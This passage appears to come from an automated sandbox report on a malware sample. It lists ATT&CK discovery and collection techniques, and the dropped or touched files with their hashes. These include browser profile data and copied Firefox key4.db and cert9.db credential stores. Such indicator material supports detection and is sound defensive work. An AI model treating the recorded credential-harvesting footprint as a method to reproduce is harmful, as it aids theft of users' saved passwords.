Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Filesize
847B

MD5
f8ec7f563d06ccddddf6c96b8957e5c8

SHA1
73bdc49dcead32f8c29168645a0f080084132252

SHA256
38ef57aec780edd2c8dab614a85ce87351188fce5896ffebc9f69328df2056ed

SHA512
8830821ac9edb4cdf4d8a3d7bc30433987ae4c158cf81b705654f54aaeba366c5fa3509981aceae21e193dd4483f03b9d449bc0a32545927d3ca94b0f9367684

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dc058ebc0f8181946a312f0be99ed79c

SHA1
0c6f376ed8f2d4c275336048c7c9ef9edf18bff0

SHA256
378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a

SHA512
36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a0486d6f8406d852dd805b66ff467692

SHA1
77ba1f63142e86b21c951b808f4bc5d8ed89b571

SHA256
c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be

SHA512
065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
c1cdf18c1cc10af73aa5543d0258290a

SHA1
a237be888ae44f023049b05b0141f4f9e688f469

SHA256
37560d5d1a7bf31c1b6875a4d9b6703e9f5e93abe2114c80685a0bf1745a6935

SHA512
249b4f4837045bd496a7d6d61787e005e34691a1a2e1a853113f6fe5cb5d982292949d3bec63f300cad45b21e0a418949911dc06688af91ec73c4d7fff387206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
413B

MD5
4ad5e7f856945d7ad78b0af341f8a264

SHA1
22146d96ca70a7d6b7dc59912f588053701da3eb

SHA256
978dc2c03794c552e780008a07a33b185af90c76a27bfa9924cc28df8e96eef1

SHA512
3c740b6df4a736b71514e6ef8f9e189f766ce7be0a40174198d62e8de1c9e4ee5120a1cb3fba27f6b10b71d5082ed51e84c9f8e7045448ca479ef4eceb0f2a10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
bee6499bdcf85c487dfd752a2cc47260

SHA1
1ee63002f3dc85f17839093d9b52b7fb1e62287f

SHA256
6a7dd75555782576b2887b03ccf38fafd8e549c837cd351d5c3776018e340d39

SHA512
94416bbb32b3e45f0855c6bbb950f1db6721c4238ec162b661fdec980fb1dba9d82bd03cc8390d391711d5f159516a52aaf7db401cec47bfe61305477fe4e8f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
86fbdeb57d538fb93fbeadb66c3879cc

SHA1
5508357e7e87d6cd8db04e19658ac3ff5df246bd

SHA256
15c4635ffff9c4acab40c415ecfe1dde9012d38de89f52047f931804d83626bc

SHA512
eb49fa7629d66d3a1acf0b305c626b634b228848df87c2f4000905550c6223149fd2619abded36a1838053a5dc1d6dabc7d3314e049c8eb9a65adc5650842427

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
905a7c11a7396bf862d71de1ea86b09c

SHA1
63205f966f269300bef3fb374a112bfbfdad9006

SHA256
2f2caee16e88bd168c2dfff8db1107a6b0cbc53aef6720559071e83901ff58b2

SHA512
111470191b27b8bb1f7dddef3a53a9142bbb725ceb8a6f5c263d58d0e9f2113d6efb775b4c739d32cbd74f63f58eddf5c113ceb5563892986f687e4127fdb959

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
4ae5f886edc3a6beeda3279ccdf75a3e

SHA1
ef88ef33b8de3dc712afb8a447937fa48e69c495

SHA256
ddb1b982d9797d4f101dc0a6ee3875bca050789dd13c2e61e725319fd09c7001

SHA512
090bbd6a1cd56efdcae2318474476c3c542eb696c38cf784ea46d79f8343c6e64397322a0d6af6e84ee4cf8519ea7ebb796d5007461b5acd5b42f9da9b8c46a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
769fa408c5e8900faee37e214105636c

SHA1
4e31552d96778bd8ddedaa8ae03e4a1f935119a4

SHA256
b9f1b89917fc70dbd7a5a24b64b043dade210d732e7c22ce7d70d0feb1c37b04

SHA512
4dee61d68a6913a28b82285881a1da06740a1266c30cb2e6d74ab89104784868362ae8f8d695a99ed962454b34d485fe09489be4d989b751580d8e9ff602b0b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
a847bea533ed1c319b124f64a869723a

SHA1
3191ed25aa5c717f68bc305053a04400c817647d

SHA256
3bcb3c63d5c85cc880f4ec18f2f20c3a7cf02da95e76f41c4c88ba5d097bf994

SHA512
6e77151397d00a1cde483ac06aedbfa0d364ec40fa9d48d536a3e688858156e3e17466f95a292a1093aa04e518b7700c499ace3976dc2dfbb9b40a8d579b5cbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0GUUC90F\LYJ0nmYo[1].txt

Filesize
3KB

MD5
00578284d847df35b14a22a76cc3097e

SHA1
1ec9b514ddcc6353336e2c3a9026901806d614ef

SHA256
bb2d223426e172a66ac103ce662d64b53e9352273086767d13183f423290795c

SHA512
05781ed31cd7d175289ffe2f5f4479dae04008fedc5dbebd31211972bf2f6e5f097597059156df05cb10f84fd4472d4f868788b46e1e3067121723947cd9033d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7d5d8cf9f65ce79e552409c240295219

SHA1
ec5e938110638dcd176ce0645682a0d3949dd5a8

SHA256
817d6bfa16b959aae0dec64568ec6d98fdd61a205c61dde60551e192e5478596

SHA512
0d06c42b9c5648311000eefe9bd5a952dafd999b5c7ab17dbbebb6c6d9cd4b1de451e13ef0af72dfa3557aee8cb8bb5521642db843c3f61dfd701dd6c95afb68

Download Submit
C:\Users\Admin\AppData\Local\Temp\7fmsgkth.default-release\cert9.db

Filesize
224KB

MD5
c3f87d238aaed9863b6793637d2a2b70

SHA1
8125a310c5917614e923f0199c29ba9db940f4e5

SHA256
1e09147618a4cb8a9f1934d7aa7e5a1d63e6b59d520f99d2463da9f985862e28

SHA512
f1ea6ac293be1198fedaa6ab1a797e287d6ec3ad04b4918526a30e1dd53e39f3f7ae859695f5fc263f26433c40e1a295d7bea1ce8d3d15a55adc7c3227533b95

Download Submit
C:\Users\Admin\AppData\Local\Temp\7fmsgkth.default-release\key4.db

Filesize
288KB

MD5
835216de14bf2793abd0586da1d76ce1

SHA1
bd87afd6af0104d875ccd1216543efedc79e0348

SHA256
27fbf4c0081c9f9116dc8ac834b418d2e5e487a234b311c4d01df520e632ac42

SHA512
340834eab831ddf8caa8ea671e852dd02a203730a2dfde79789a843343916e6b5e644556646ae9c3a149220960442669b7e66755819afd8f9825a79032e7623f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j4yinmxg.p0d.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE21D.tmp.dat

Filesize
114KB

MD5
d9f3a549453b94ec3a081feb24927cd7

SHA1
1af72767f6dfd1eaf78b899c3ad911cfa3cd09c8

SHA256
ff366f2cf27da8b95912968ac830f2db3823f77c342e73ee45ec335dbc2c1a73

SHA512
f48765c257e1539cacce536e4f757e3d06388a6e7e6c7f714c3fce2290ce7cdb5f0e8bb8db740b5899ba8b53e2ed8b47e08b0d043bb8df5a660841dc2c204029

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE22E.tmp.dat

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 116005.crdownload

Filesize
175KB

MD5
264037129eb962de8ac0662d390f3253

SHA1
3839607c70a6e064fd91beffcc24cc4b86f9d3a2

SHA256
588959b8dea9e5ec4dba118b2e7964063a7a7cc1d82b830a483b791875f206a6

SHA512
b6920bab9767ba99b56f28a1e1f7d031a329822d7aeec040c24cd51755841cfe40a59fdbf4bb3a629aa2f40ec6f2a96ef96dab86857eff24a9826bf509621e7e

Download Submit
memory/316-172-0x0000021EA71C0000-0x0000021EA71D2000-memory.dmp

Filesize
72KB

Download
memory/2528-159-0x0000000005300000-0x0000000005366000-memory.dmp

Filesize
408KB

Download
memory/2528-212-0x0000000006EA0000-0x0000000007444000-memory.dmp

Filesize
5.6MB

Download
memory/2528-213-0x00000000068F0000-0x0000000006966000-memory.dmp

Filesize
472KB

Download
memory/2528-182-0x00000000060E0000-0x00000000062A2000-memory.dmp

Filesize
1.8MB

Download
memory/2528-217-0x0000000006970000-0x0000000006A02000-memory.dmp

Filesize
584KB

Download
memory/2528-237-0x0000000007980000-0x0000000007EAC000-memory.dmp

Filesize
5.2MB

Download
memory/2528-181-0x00000000060C0000-0x00000000060D2000-memory.dmp

Filesize
72KB

Download
memory/2528-147-0x0000000000400000-0x00000000004E6000-memory.dmp

Filesize
920KB

Download
memory/3156-137-0x000002D6ACA40000-0x000002D6ACA46000-memory.dmp

Filesize
24KB

Download
memory/3156-136-0x000002D6ACA30000-0x000002D6ACA42000-memory.dmp

Filesize
72KB

Download
memory/3156-135-0x000002D6AC800000-0x000002D6AC822000-memory.dmp

Filesize
136KB

Download